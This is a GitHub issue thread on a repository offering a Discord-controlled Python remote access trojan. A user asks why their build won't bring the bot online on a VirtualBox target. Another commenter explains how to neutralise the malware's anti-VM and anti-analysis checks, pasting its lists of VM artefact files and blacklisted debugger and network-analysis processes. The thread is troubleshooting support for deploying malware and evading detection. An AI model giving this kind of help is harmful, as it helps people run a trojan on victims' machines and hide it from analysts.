mategol / PySilon-malware

Advanced RAT written in Python language, fully controllable through Discord with dedicated GUI builder to make preparation easier.
https://pysilon.net
MIT License
668 stars 108 forks source link

Not creating new channels or starting procedure #483

Open Dagilio opened 2 days ago

Dagilio commented 2 days ago

Set my discord server and bot up according to instructions, corrrectly pasted in the bot token and server id, when the build is ran it clearly runs in the background but it does not even do anything within the discord server. It doesn't even appear to bring the bot online. Wondering why. What should happen is when i run it on my target pc i should get access from the disc server right? Yet nothing at all. idk.

Dagilio commented 2 days ago

Let me add im using a virtualbox as the target

Dagilio commented 2 days ago

"Traceback (most recent call last): File "source_prepared.py", line 58, in ModuleNotFoundError: No module named 'resources.protections'

Luminous-Journey commented 2 days ago

did you delete the protections file?

Luminous-Journey commented 2 days ago

if yes, in order to make it run in a vm you need to make vm_files = [ "C:\\windows\\system32\\vmGuestLib.dll", "C:\\windows\\system32\\vm3dgl.dll", "C:\\windows\\system32\\vboxhook.dll", "C:\\windows\\system32\\vboxmrxnp.dll", "C:\\windows\\system32\\vmsrvc.dll", "C:\\windows\\system32\\drivers\\vmsrvc.sys" ] blacklisted_processes = [ 'vmtoolsd.exe', 'vmwaretray.exe', 'vmwareuser.exe' 'fakenet.exe', 'dumpcap.exe', 'httpdebuggerui.exe', 'wireshark.exe', 'fiddler.exe', 'vboxservice.exe', 'df5serv.exe', 'vboxtray.exe', 'vmwaretray.exe', 'ida64.exe', 'ollydbg.exe', 'pestudio.exe', 'vgauthservice.exe', 'vmacthlp.exe', 'x96dbg.exe', 'x32dbg.exe', 'prl_cc.exe', 'prl_tools.exe', 'xenservice.exe', 'qemu-ga.exe', 'joeboxcontrol.exe', 'ksdumperclient.exe', 'ksdumper.exe', 'joeboxserver.exe', ] look more like vm_files = [] blacklisted_processes = [] in protections

Dagilio commented 2 days ago

I didnt delete the whole protections, just deleted: def protection_check(): vm_files = [ "C:\windows\system32\vmGuestLib.dll", "C:\windows\system32\vm3dgl.dll", "C:\windows\system32\vboxhook.dll", "C:\windows\system32\vboxmrxnp.dll", "C:\windows\system32\vmsrvc.dll", "C:\windows\system32\drivers\vmsrvc.sys" ]